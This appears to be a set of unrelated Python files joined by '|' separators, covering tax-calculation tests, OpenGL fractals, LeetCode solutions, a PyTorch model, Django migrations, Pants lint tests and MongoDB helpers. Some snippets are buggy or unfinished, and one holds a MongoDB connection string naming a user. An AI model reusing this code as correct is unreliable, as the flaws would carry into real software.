self.credit = Credit(0, 0, 0, 0, None, 0, 0)
def testInit(self):
_ = Annexe_2044(self._database, None, None, 0)
def testBaseImpossable(self):
bien_immo = Bien_Immo(0, 0, 0, 0, 0)
lot = Lot("", 0, 500)
bien_immo.add_lot(lot)
irr = Annexe_2044(self._database, bien_immo, self.credit, 0)
# Pas de charges
self.assertAlmostEqual(irr.base_impossable, 6000)
charge = Charge(lot)
lot.charge = charge
# Copropriete
charge.add(charge.deductible_e.copropriete, 1000)
self.assertAlmostEqual(irr.base_impossable, 5000)
# Taxe fonciere
charge.add(charge.deductible_e.copropriete, 800)
self.assertAlmostEqual(irr.base_impossable, 4200)
# PNO
charge.add(charge.deductible_e.prime_assurance, 100)
self.assertAlmostEqual(irr.base_impossable, 4100)
# Autres
charge.add(Charge.charge_e.provision_travaux, 0.01)
charge.add(Charge.charge_e.vacance_locative, 1 / 12)
self.assertAlmostEqual(irr.base_impossable, 4100)
# Gestion agence locative
charge.add(Charge.charge_e.agence_immo, 0.05)
self.assertAlmostEqual(irr.base_impossable, 3800)
def testRevenuFoncierImpossableA(self):
bien_immo = Bien_Immo(0, 0, 0, 0, 0)
lot = Lot("", 0, 500)
bien_immo.add_lot(lot)
charge = Charge(lot)
lot.charge = charge
irr = Annexe_2044(self._database, bien_immo, self.credit, 0)
self.assertAlmostEqual(irr.revenu_foncier_impossable, 0)
irr = Annexe_2044(self._database, bien_immo, self.credit, 0.11)
self.assertAlmostEqual(irr.revenu_foncier_impossable, 660)
charge.add(charge.deductible_e.copropriete, 1000)
self.assertAlmostEqual(irr.revenu_foncier_impossable, 550)
@unittest.skip('todo')
def testRevenuFoncierImpossableB(self):
'''
Take into account credit
'''
pass
def testPrelevementSociaux(self):
bien_immo = Bien_Immo(0, 0, 0, 0, 0)
lot = Lot("", 0, 500)
bien_immo.add_lot(lot)
charge = Charge(lot)
lot.charge = charge
irr = Annexe_2044(self._database, bien_immo, self.credit, 0.11)
self.assertAlmostEqual(irr.prelevement_sociaux_montant, 1032)
charge.add(charge.deductible_e.copropriete, 1000)
self.assertAlmostEqual(irr.prelevement_sociaux_montant, 860)
def testImpotTotal(self):
bien_immo = Bien_Immo(0, 0, 0, 0, 0)
lot = Lot("", 0, 500)
bien_immo.add_lot(lot)
charge = Charge(lot)
lot.charge = charge
irr = Annexe_2044(self._database, bien_immo, self.credit, 0.11)
self.assertAlmostEqual(irr.impot_total, 1032 + 660)
charge.add(charge.deductible_e.copropriete, 1000)
self.assertAlmostEqual(irr.impot_total, 860 + 550)
if __name__ == '__main__':
unittest.main()
|
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import sys
def ROUND(a):
return int(a+0.5)
k=0
def init():
glClearColor(0.0,1.0,1.0,0.0)
glPointSize(2.0)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluOrtho2D(0.0,600.0,0.0,600.0)
def setPixel(x,y):
glBegin(GL_POINTS)
glVertex2i(x,y)
glEnd()
glFlush()
def readvertices():
global n,x0,y0,x1,y1,x2,y2
x0=input("Enter 1st_x: ")
y0=input("Enter 1st_y: ")
x1=input("Enter 2nd_x: ")
y1=input("Enter 2nd_y: ")
x2=input("Enter 3rd_x: ")
y2=input("Enter 3rd_y: ")
n=input("Enter level of sierpensky: ")
def lineDDA(x0,y0,xEnd,yEnd):
delta_x=xEnd-x0
delta_y=yEnd-y0
dx=abs(xEnd-x0)
dy=abs(yEnd-y0)
x,y=x0,y0
steps=dx if dx>dy else dy
if steps !=0:
change_x=dx/float(steps)
change_y=dy/float(steps)
else:
change_x=0
change_y=0
setPixel(ROUND(x),ROUND(y))
for k in range(steps):
if delta_x >= 0:
x+=change_x
else:
x-=change_x
if delta_y >= 0:
y+=change_y
else:
y-=change_y
setPixel(ROUND(x),ROUND(y))
def draw_triangle(x0,y0,x1,y1,x2,y2):
lineDDA(x0,y0,x1,y1)
lineDDA(x1,y1,x2,y2)
lineDDA(x0,y0,x2,y2)
def sierpensky(x0,y0,x1,y1,x2,y2,k):
k+=1
if k>n:
return
mx0=(x0+x1)/2
my0=(y0+y1)/2
mx1=(x1+x2)/2
my1=(y1+y2)/2
mx2=(x2+x0)/2
my2=(y2+y0)/2
glColor3f(1.0,1.0,1.0)
draw_triangle(mx0,my0,mx1,my1,mx2,my2)
sierpensky(x0,y0,mx0,my0,mx2,my2,k)
sierpensky(mx0,my0,x1,y1,mx1,my1,k)
sierpensky(mx1,my1,x2,y2,mx2,my2,k)
def Display():
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0,0.0,0.0)
draw_triangle(x0,y0,x1,y1,x2,y2)
sierpensky(x0,y0,x1,y1,x2,y2,k)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(600,600)
glutInitWindowPosition(50,50)
glutCreateWindow("Seirpensky Triangle")
readvertices()
glutDisplayFunc(Display)
init()
glutMainLoop()
main()
|
class List(list):
def __init__(self):
super(self)
|
import config
import core_functions
import datetime
import time
|
def cal_num(*args):
return sum(args), sum(args)/len(args)
Sum , Mean = cal_num(10,20,30)
print("3개의 인자 (10,20,30)")
print(f"합계 : {Sum}, 평균 : {Mean}")
Sum , Mean = cal_num(10,20,30,40,50)
print("5개의 인자 (10,20,30,40,50)")
print(f"합계 : {Sum}, 평균 : {Mean}")
|
# -*- coding: utf-8 -*-
class Solution:
def findRepeatedDnaSequences(self, s):
result = set()
if len(s) < 11:
return []
seen = set([s[:10]])
for i in range(10, len(s)):
sequence = s[i - 9 : i + 1]
if sequence in seen:
result.add(sequence)
seen.add(sequence)
return list(result)
if __name__ == "__main__":
solution = Solution()
expected = ["AAAAACCCCC", "CCCCCAAAAA"]
result = solution.findRepeatedDnaSequences("AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT")
assert sorted(expected) == sorted(result)
|
from keygenerator import *
from ..translators.numberedalphabettranslator import *
import random
class NumberKeyGenerator(KeyGenerator):
def __init__(self, max_number=26, rand_func=lambda x: x ** 6, **kwargs):
"""To be used with CaesarTranslator"""
KeyGenerator.__init__(self, **kwargs)
self.max_number = max_number
self.randFunc = rand_func
def getRandomKey(self):
return random.randint(0, self.max_number - 1)
def getAllKeys(self):
return xrange(self.max_number)
def mutateKey(self, key):
"""Change randFunc for different transformation number after random.random"""
return (key + int(self.randFunc(random.random() + 1))) % self.max_number
|
"""
Author: Zhen Dong
Time : 2020-09-19 23:19
"""
import torch
import torch.nn as nn
# 4ms * 15
conv1_ksize = (15, 1)
# 20 channels
conv2_ksize = (1, 20)
conv1_isize = 1
conv1_osize = 5
conv2_isize = conv1_osize
conv2_osize = 10
fc1_dropout_p = 0.3
fc2_dropout_p = 0.3
fc1_isize = 610
fc1_osize = 128
fc2_isize = fc1_osize
fc2_osize = 1
class ConvLayer(nn.Module):
def __init__(self, isize, osize, ksize, maxpool=None):
super(ConvLayer, self).__init__()
self.layer = nn.Sequential(
nn.Conv2d(isize, osize, ksize),
nn.BatchNorm2d(osize),
nn.ReLU()
)
# optional maxpool
self.maxpool = None
if maxpool:
self.maxpool = nn.MaxPool2d(maxpool)
def forward(self, x):
x = self.layer(x)
if self.maxpool:
x = self.maxpool(x)
return x
class LinearLayer(nn.Module):
def __init__(self, isize, osize, dropout_p, norm=True, activate=True):
super(LinearLayer, self).__init__()
self.dropout = nn.Dropout(p=dropout_p)
self.linear = nn.Linear(isize, osize)
self.batch_norm = nn.BatchNorm1d(osize) if norm else None
self.activate = nn.ReLU() if activate else None
def forward(self, x):
x = self.dropout(x)
x = self.linear(x)
if self.batch_norm:
x = self.batch_norm(x)
if self.activate:
x = self.activate(x)
return x
class ConvNet(nn.Module):
def __init__(self):
super(ConvNet, self).__init__()
self.in_batch_norm = nn.BatchNorm2d(conv1_isize)
self.feat_extractor = nn.Sequential(
ConvLayer(conv1_isize, conv1_osize, conv1_ksize),
ConvLayer(conv2_isize, conv2_osize, conv2_ksize)
)
self.fc_layer = nn.Sequential(
LinearLayer(fc1_isize, fc1_osize, fc1_dropout_p),
LinearLayer(fc2_isize, fc2_osize, fc2_dropout_p, norm=False, activate=False),
nn.Sigmoid()
)
def forward(self, x):
x = self.in_batch_norm(x)
x = self.feat_extractor(x)
# flatten the input
batch_size = x.size()[0]
x = x.view(batch_size, -1)
# fc layer
x = self.fc_layer(x)
return x
|
import scrapy
from scrapy.loader.processors import TakeFirst
class BooksImagesItem(scrapy.Item):
file_urls = scrapy.Field()
files = scrapy.Field()
file_name = scrapy.Field(
output_processor=TakeFirst()
)
|
import numpy as np
import json
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import TfidfVectorizer
STOP_WORDS = stopwords.words("english")
# get map from userid -> clusterid
def get_user2cluster(filepath):
with open(filepath, "r") as f:
content = f.readlines()
f.close()
user2cluster = {}
for line in content:
tmp = line.split(" ")
userid = long(tmp[0])
clusterid = int(tmp[1])
user2cluster[userid] = clusterid
return user2cluster
# get map from clusterid -> array of member id's
def get_cluster2users(filepath):
with open(filepath, "r") as f:
content = f.readlines()
f.close()
cluster2users = {}
for line in content:
tmp = line.split(" ")
userid = long(tmp[0])
clusterid = int(tmp[1])
if clusterid in cluster2users:
cluster2users[clusterid].append(userid)
else:
cluster2users[clusterid] = [userid]
return cluster2users
# get map from userid -> text of all tweets
def get_user2tweets(filepath):
user2tweets = {}
with open(filepath, 'rb') as f:
i = 0
for line in f:
tweet = json.loads(line)
user_id = tweet['user']['id']
text = tweet['text'].lower().replace("\n", "")
if user_id not in user2tweets:
user2tweets[user_id] = ""
user2tweets[user_id] = user2tweets[user_id] + " " + text
f.close()
return user2tweets
# get map from userid -> string of hashtags used (string separated)
def get_user2hashtags(filepath):
with open(filepath, "r") as f:
content = f.readlines()
f.close()
user2hashtags = {}
for line in content:
tmp = line.split(" ")
userid = long(tmp[0])
hashtag = tmp[1]
if userid in user2hashtags:
user2hashtags[userid] = user2hashtags[userid] + " " + hashtag
else:
user2hashtags[userid] = hashtag
return user2hashtags
# randomly sample from given cluster
def select_from_cluster(cluster2users, npeople, clusterid):
cluster_members = np.array(cluster2users[clusterid])
return np.random.choice(cluster_members, size=npeople, replace=False)
# sample npeople from 2 largest clusters
# computer similarity of their associated documents
def get_similarity(cluster2users, user2text, npeople, stop=True):
cluster_biggest = -1
cluster_2biggest = -1
cluster_biggest_id = None
cluster_2biggest_id = None
for clusterid in cluster2users.keys():
users = cluster2users[clusterid]
if len(users) >= cluster_biggest:
cluster_2biggest = cluster_biggest
cluster_biggest = len(users)
cluster_2biggest_id = cluster_biggest_id
cluster_biggest_id = clusterid
elif len(users) > cluster_2biggest:
cluster_2biggest = len(users)
cluster_2biggest_id = clusterid
userset1 = select_from_cluster(cluster2users, npeople, cluster_biggest_id)
userset2 = select_from_cluster(cluster2users, npeople, cluster_2biggest_id)
docs = []
for user in userset1:
if user in user2text:
docs.append(user2text[user])
else:
docs.append("")
for user in userset2:
if user in user2text:
docs.append(user2text[user])
else:
docs.append("")
vect = TfidfVectorizer(min_df=1,stop_words=STOP_WORDS if stop else None)
tfidf = vect.fit_transform(docs)
sim = (tfidf * tfidf.T).A
within1 = np.array(sim[:npeople, :npeople])
within2 = np.array(sim[npeople:, npeople:])
between = np.array(sim[:npeople, npeople:])
within1_avg = (np.sum(within1) - np.trace(within1)) / (npeople * npeople - npeople)
within2_avg = (np.sum(within2) - np.trace(within1)) / (npeople * npeople - npeople)
between_avg = np.mean(between)
return sim, within1_avg, within2_avg, between_avg
# perform analysis
# setup
DATA = "/media/rhenwood39/OS/6850_proj/efilter/resultsFirst1M.json"
SOURCE = "./1MRichieJson/"
cluster_filepaths = ["retweet_rm_clust.txt", "mentions_rm_clust.txt", "replies_rm_clust.txt", "retweet_rm_lelp_clust.txt", "mentions_rm_lelp_clust.txt", "replies_rm_lelp_clust.txt"]
output = ["retweet_labprop", "mentions_labprop", "replies_labprop", "retweet_modlabprop", "mentions_modlabprop", "replies_modlabprop"]
# get tweets
user2tweets = get_user2tweets(DATA)
# wi1s = []
# wi2s = []
# bws = []
# cluster sim
# for file in cluster_filepaths:
# cluster2users = get_cluster2users(SOURCE + file)
# sim,wi1,wi2,bw = get_similarity(cluster2users, user2docs, 2000)
# wi1s.append(wi1)
# wi2s.append(wi2)
# bws.append(bw)
# with open(SOURCE + "cosine_sim_analysis_hashtag.csv", "w") as f:
# f.write("source, within1, within2, between\n")
# for i in range(len(cluster_filepaths)):
# f.write(cluster_filepaths[i] + ", " + str(wi1s[i]) + ", " + str(wi2s[i]) + ", " + str(bws[i]) + "\n")
# f.close()
# get tweets for each cluster
for i in range(len(cluster_filepaths)):
file = cluster_filepaths[i]
out = output[i]
# get clusters
cluster2users = get_cluster2users(SOURCE + file)
# get 2 biggest clusters
cluster_biggest = -1
cluster_2biggest = -1
cluster_biggest_id = None
cluster_2biggest_id = None
for clusterid in cluster2users.keys():
users = cluster2users[clusterid]
if len(users) >= cluster_biggest:
cluster_2biggest = cluster_biggest
cluster_biggest = len(users)
cluster_2biggest_id = cluster_biggest_id
cluster_biggest_id = clusterid
elif len(users) > cluster_2biggest:
cluster_2biggest = len(users)
cluster_2biggest_id = clusterid
cluster1 = np.random.choice(np.array(cluster2users[cluster_biggest_id]), size=20, replace=False)
cluster2 = np.random.choice(np.array(cluster2users[cluster_2biggest_id]), size=20, replace=False)
with open("./ClusterTweets/" + out + "1.txt", "w") as f:
for i in range(len(cluster1)):
user = cluster1[i]
f.write(u"TWEET " + str(i) + u"\n")
f.write((user2tweets[user] + u"\n").encode("utf8"))
f.write(u"\n***********************************************************\n")
f.close()
with open("./ClusterTweets/" + out + "2.txt", "w") as f:
for i in range(len(cluster2)):
user = cluster2[i]
f.write(u"TWEET " + str(i) + u"\n")
f.write((user2tweets[user] + u"\n").encode("utf8"))
f.write(u"\n***********************************************************\n")
f.close()
|
import unittest
from katas.kyu_8.regex_count_lowercase_letters import lowercase_count
class LowercaseCountTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(lowercase_count('abc'), 3)
def test_equals_2(self):
self.assertEqual(lowercase_count('abcABC123'), 3)
def test_equals_3(self):
self.assertEqual(lowercase_count(
'abcABC123!@#$%^&*()_-+=}{[]|\':;?/>.<,~'), 3)
def test_equals_4(self):
self.assertEqual(lowercase_count(''), 0)
def test_equals_5(self):
self.assertEqual(lowercase_count(
'ABC123!@#$%^&*()_-+=}{[]|\':;?/>.<,~'), 0)
def test_equals_6(self):
self.assertEqual(lowercase_count('abcdefghijklmnopqrstuvwxyz'), 26)
|
# Initiates the database
client = pymongo.MongoClient("mongodb+srv://dn54321:<password>@cluster0-kixdi.mongodb.net/test?retryWrites=true&w=majority")
db = client.test
|
#coding:utf-8
from moteur import *
mversion=[1.1]
titre=""
description=""
intro="debut"
fin="fin"
########
objet=Obj()
objet.nom='objet'
Endroit=Lieu()
Endroit.nom='endroit'
Endroit.objs.append(objet)
########
perso=Perso()
perso.nom=""
perso.lieu_actu=Endroit
print(intro)
inp("")
main(perso,objet)
inp("")
print(fin)
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Copied from env/doc/make_rst_table.py
http://stackoverflow.com/questions/11347505/what-are-some-approaches-to-outputting-a-python-data-structure-to-restructuredte
"""
import os, logging, numpy as np
log = logging.getLogger(__name__)
def make_rst_table(grid):
max_cols = [max(out) for out in map(list, zip(*[[len(item) for item in row] for row in grid]))]
rst = table_div(max_cols, 1)
for i, row in enumerate(grid):
header_flag = i == 0 or i == len(grid)-1
rst += normalize_row(row,max_cols)
if header_flag or row[0].strip()[-1] == "]":
rst += table_div(max_cols, header_flag )
return rst
def table_div(max_cols, header_flag=1):
out = ""
if header_flag == 1:
style = "="
else:
style = "-"
for max_col in max_cols:
out += max_col * style + " "
out += "\n"
return out
def normalize_row(row, max_cols):
"""
Padding to equalize cell string lengths
"""
r = ""
for i, max_col in enumerate(max_cols):
r += row[i] + (max_col - len(row[i]) + 1) * " "
return r + "\n"
def fmt(cellkind, prefix="", trim="key"):
cell, kind = cellkind
# indicates a skipped field
if kind is None:
return None
if kind == "f":
fmt = "%5.2f"
elif kind == "i":
fmt = "%d"
else:
fmt = "%s"
pass
if type(cell) is str or type(cell) is np.string_:
s = str(cell)
if s == trim:
return prefix
elif s.startswith(prefix):
return s[len(prefix):]
else:
return s
return fmt % cell
def recarray_as_rst(ra, trim="key", skip=[]):
"""
Expecting recarray with dtype of form:
dtype=[('key', 'S64'), ('X', '<f4'), ('Y', '<f4'), ('Z', '<f4'), ('T', '<f4'), ('A', '<f4'), ('B', '<f4'), ('C', '<f4'), ('R', '<f4')]
======================= ===== ===== ===== ===== ===== ===== ===== =====
PmtInBox/torch X Y Z T A B C R
======================= ===== ===== ===== ===== ===== ===== ===== =====
[TO] BT SA 1.15 1.00 0.00 0.00 1.06 1.03 0.00 1.13
TO [BT] SA 1.15 1.00 1.06 0.91 1.06 1.03 0.00 1.13
TO BT [SA] 0.97 1.02 1.05 0.99 1.06 1.03 0.00 1.25
[TO] BT SD 0.91 0.73 0.56 0.56 0.98 1.09 0.56 0.88
TO [BT] SD 0.91 0.73 0.81 0.89 0.98 1.09 0.56 0.88
TO BT [SD] 0.99 0.83 0.97 0.99 0.98 1.09 0.56 0.89
[TO] BT BT SA 0.95 0.82 0.04 0.04 0.97 0.89 0.04 0.57
TO [BT] BT SA 0.95 0.82 0.70 0.50 0.97 0.89 0.04 0.57
TO BT [BT] SA 0.91 0.94 0.43 0.60 0.97 0.89 0.04 0.05
TO BT BT [SA] 0.93 0.87 0.04 0.35 0.97 0.89 0.04 0.72
======================= ===== ===== ===== ===== ===== ===== ===== =====
"""
grid = []
kinds = map( lambda k:None if k in skip else ra.dtype[k].kind, ra.dtype.names )
kfield = getattr(ra, trim, None)
if kfield is None:
prefix = ""
else:
prefix = os.path.commonprefix(map(str,kfield))
pass
label_kinds = [None if k in skip else "S" for k in ra.dtype.names] # all "S" for string, or None for skips
grid.append(filter(None,map(lambda _:fmt(_,prefix, trim),zip(ra.dtype.names,label_kinds))))
for i in range(len(ra)):
grid.append(filter(None,map(lambda _:fmt(_,prefix, trim),zip(ra[i],kinds))))
pass
return make_rst_table(grid)
def test_make_rst_table():
print(make_rst_table( [['Name', 'Favorite Food', 'Favorite Subject'],
['Joe', 'Hamburgrs', 'I like things with really long names'],
['Jill', 'Salads', 'American Idol'],
['Sally', 'Tofu', 'Math']]))
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
path = os.path.expandvars("$TMP/stat.npy")
log.info("path %s " % path )
stat = np.load(path).view(np.recarray)
print(recarray_as_rst(stat))
|
from django.shortcuts import render
from weekapp.models import Week
def week(request):
weeks = Week.objects.all()
context = {
'weeks': weeks,
'page_title': 'weeks',
}
return render(request, 'weekapp/week.html', context)
|
from daos.erequest_dao import ErequestDAOf
from entities.erequest import Erequest
from exceptions.resource_not_found import ResourceNotFound
class ErequestDaoLocal(ErequestDAOf):
id_maker = 0
erequest_table = {}
def create_request(self, erequest: Erequest) -> Erequest:
ErequestDaoLocal.id_maker += 1
erequest.employee_id = ErequestDaoLocal.id_maker
ErequestDaoLocal.erequest_table[erequest.employee_id] = erequest
return erequest
def get_all_requests(self) -> List[Erequest]:
pass
def get_request_by_eid(self, employee_id: int) -> Erequest:
pass
def update_request(self, erequest: Erequest, employee_id: int, erequest_id: int) -> Erequest:
pass
def delete_request(self, erequest_id: int) -> bool:
pass
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from typing import Sequence
import pytest
from pants.backend.python import target_types_rules
from pants.backend.python.lint.pydocstyle.rules import PydocstyleRequest
from pants.backend.python.lint.pydocstyle.rules import rules as pydocstyle_rules
from pants.backend.python.lint.pydocstyle.subsystem import PydocstyleFieldSet
from pants.backend.python.lint.pydocstyle.subsystem import rules as pydocstyle_subsystem_rules
from pants.backend.python.target_types import PythonSourcesGeneratorTarget
from pants.backend.python.util_rules.interpreter_constraints import InterpreterConstraints
from pants.core.goals.lint import LintResult, Partitions
from pants.core.util_rules import config_files, source_files
from pants.engine.addresses import Address
from pants.engine.target import Target
from pants.testutil.python_interpreter_selection import all_major_minor_python_versions
from pants.testutil.rule_runner import QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
*pydocstyle_rules(),
*pydocstyle_subsystem_rules(),
*source_files.rules(),
*config_files.rules(),
*target_types_rules.rules(),
QueryRule(Partitions, [PydocstyleRequest.PartitionRequest]),
QueryRule(LintResult, [PydocstyleRequest.Batch]),
],
target_types=[PythonSourcesGeneratorTarget],
)
GOOD_FILE = '''
"""Public module docstring is present."""
def fun():
"""Pretty docstring is present."""
pass
'''
BAD_FILE = """
def fun():
'''ugly docstring!'''
pass
"""
def run_pydocstyle(
rule_runner: RuleRunner, targets: list[Target], *, extra_args: list[str] | None = None
) -> Sequence[LintResult]:
rule_runner.set_options(
[
"--backend-packages=pants.backend.python.lint.pydocstyle",
*(extra_args or ()),
],
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
)
partitions = rule_runner.request(
Partitions[PydocstyleFieldSet, InterpreterConstraints],
[
PydocstyleRequest.PartitionRequest(
tuple(PydocstyleFieldSet.create(tgt) for tgt in targets)
)
],
)
results = []
for partition in partitions:
result = rule_runner.request(
LintResult,
[PydocstyleRequest.Batch("", partition.elements, partition.metadata)],
)
results.append(result)
return tuple(results)
def assert_success(
rule_runner: RuleRunner, target: Target, *, extra_args: list[str] | None = None
) -> None:
result = run_pydocstyle(rule_runner, [target], extra_args=extra_args)
assert len(result) == 1
assert result[0].exit_code == 0
@pytest.mark.platform_specific_behavior
@pytest.mark.parametrize(
"major_minor_interpreter",
all_major_minor_python_versions(["CPython>=3.7,<4"]),
)
def test_passing(rule_runner: RuleRunner, major_minor_interpreter: str) -> None:
rule_runner.write_files({"f.py": GOOD_FILE, "BUILD": "python_sources(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
assert_success(
rule_runner,
tgt,
extra_args=[f"--python-interpreter-constraints=['=={major_minor_interpreter}.*']"],
)
def test_failing(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"f.py": BAD_FILE, "BUILD": "python_sources(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
result = run_pydocstyle(rule_runner, [tgt])
assert len(result) == 1
assert result[0].exit_code == 1
assert "D100: Missing docstring in public module" in result[0].stdout
def test_multiple_targets(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{"good.py": GOOD_FILE, "bad.py": BAD_FILE, "BUILD": "python_sources(name='t')"}
)
tgts = [
rule_runner.get_target(Address("", target_name="t", relative_file_path="good.py")),
rule_runner.get_target(Address("", target_name="t", relative_file_path="bad.py")),
]
result = run_pydocstyle(rule_runner, tgts)
assert len(result) == 1
assert result[0].exit_code == 1
assert "good.py" not in result[0].stdout
assert "D400: First line should end with a period (not '!')" in result[0].stdout
def test_respects_config_file(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"f.py": BAD_FILE,
"BUILD": "python_sources(name='t')",
".pydocstyle.ini": "[pydocstyle]\nignore = D100,D300,D400,D403",
}
)
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
assert_success(rule_runner, tgt, extra_args=["--pydocstyle-config=.pydocstyle.ini"])
def test_respects_passthrough_args(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"f.py": BAD_FILE, "BUILD": "python_sources(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
assert_success(
rule_runner, tgt, extra_args=["--pydocstyle-args='--ignore=D100,D300,D400,D403'"]
)
def test_skip(rule_runner: RuleRunner) -> None:
rule_runner.write_files({"f.py": BAD_FILE, "BUILD": "python_sources(name='t')"})
tgt = rule_runner.get_target(Address("", target_name="t", relative_file_path="f.py"))
result = run_pydocstyle(rule_runner, [tgt], extra_args=["--pydocstyle-skip"])
assert not result
|
#n= 3
n=input()
c=0
while n!=1:
if n%2==0:
n=n/2
else :
n=(3*n+1)/2
c=c+1
print c
|
#!thesis/DB
import mainDB
db = mainDB.db
n = db.nodes
nrs = db.nodesRes
def deleteNode(token):
old_val = n.find_one({'_id': token})
if old_val["role"] == "MASTER":
return "Cannot remove master node"
n.delete_one({'_id': token})
mainDB.removeNodeReplicaSet(old_val)
nrs.delete_one({'_id': token})
return "DONE"
def insertNode(value):
value = mainDB.insertNodeReplicaSet(value)
name = value["name"]
value['_id'] = name
n.insert_one(value)
info = {
'_id': name,
'cpu': -1,
'memory': -1}
nrs.insert_one(info)
return name
def getNodesIP():
class NodeID():
def __init__(self, id, ip):
self.id = id
self.ip = ip
ips = []
for k in n.find():
ips.append(NodeID(k['_id'], k['ip']))
return ips
def getNode(token):
return n.find_one({'_id': token})
def getRes(token):
return nrs.find_one({'_id': token})
def allRes():
return nrs.find()
def getFullNode(token):
node = getNode(token)
res = getRes(token)
node['cpu'] = res['cpu']
node['memory'] = res['memory']
return node
def getNodesID():
results = n.find()
if results:
keys = [str(x["_id"]) for x in results]
else:
keys = []
return keys
def getNodes():
keys = getNodesID()
nodes = []
for k in keys:
r = getFullNode(k)
nodes.append(r)
return nodes
def updateResources(token, value):
"""
token = Node's id
value = {'cpu': 13.7,
'memory': 14507.30}
"""
ins = value
ins["_id"] = token
nrs.find_one_and_replace({'_id': token}, ins)
def updateNode(token, col, value):
try:
tmp = n.find_one({'_id': token})
tmp.pop(col)
tmp[col] = value
n.find_one_and_replace({'_id': token}, tmp)
return tmp
except Exception:
return None
|
from django.db import models
class NetworkElement(models.Model):
ne_name = models.CharField(max_length=100)
ne_type = models.CharField(max_length=100)
ring_name = models.CharField(max_length=100)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-20 17:19
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='classroom',
options={'ordering': ('grade', 'name')},
),
migrations.AlterModelOptions(
name='student',
options={'ordering': ('classroom', 'user'), 'verbose_name': 'Student', 'verbose_name_plural': 'Students'},
),
]
|
# -*- coding: utf-8 -*-
from typing import List
class Solution:
def numSpecial(self, mat: List[List[int]]) -> int:
result = 0
for i in range(len(mat)):
for j in range(len(mat[0])):
if mat[i][j] == 1 and self.isSpecial(mat, i, j):
result += 1
return result
def isSpecial(self, mat: List[List[int]], i: int, j: int) -> bool:
for k in range(len(mat)):
if i != k and mat[k][j] == 1:
return False
for k in range(len(mat[0])):
if j != k and mat[i][k] == 1:
return False
return True
if __name__ == "__main__":
solution = Solution()
assert 1 == solution.numSpecial(
[
[1, 0, 0],
[0, 0, 1],
[1, 0, 0],
]
)
assert 3 == solution.numSpecial(
[
[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
]
)
assert 2 == solution.numSpecial(
[
[0, 0, 0, 1],
[1, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 0],
]
)
assert 3 == solution.numSpecial(
[
[0, 0, 0, 0, 0],
[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 1],
]
)
|
import unittest
import sys
# sys.path.append('../')
from src.area import Area
class AreaTest(unittest.TestCase):
def test_square_area_side_positive(self):
self.assertEquals(Area.square(8), 64)
def test_square_area_side_negative(self):
self.assertEquals(Area.square(-5), 0)
def test_square_area_side_zero(self):
self.assertEquals(Area.square(0), 0)
def test_square_area_side_large_number(self):
self.assertEquals(Area.square(12345678), 152415765279684)
def test_rectangle_area_valid_numbers(self):
self.assertEquals(Area.rectangle(5, 6), 30)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-30 14:48
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('challenges', '0001_initial'),
('participants', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ParticipantTeam',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('modified_at', models.DateTimeField(auto_now=True)),
('team_name', models.CharField(max_length=100)),
('challenge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='challenges.Challenge')),
],
options={
'db_table': 'participant_team',
},
),
migrations.CreateModel(
name='ParticipantTeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('modified_at', models.DateTimeField(auto_now=True)),
('participant', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='participants.Participant')),
('team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='participants.ParticipantTeam')),
],
options={
'db_table': 'participant_team_member',
},
),
]
|
class UserData(object):
@staticmethod
def populate(raw):
if not raw or not 'user' in raw:
return None
user = raw['user']
return {'id': str(user['id']),
'name': user['fullname'].encode(encoding='utf-8', errors='ignore') if 'fullname' in raw else user['username'].encode(encoding='utf-8', errors='ignore'),
'url': 'http://500px.com/{0}'.format(user['username'].encode(encoding='utf-8', errors='ignore')),
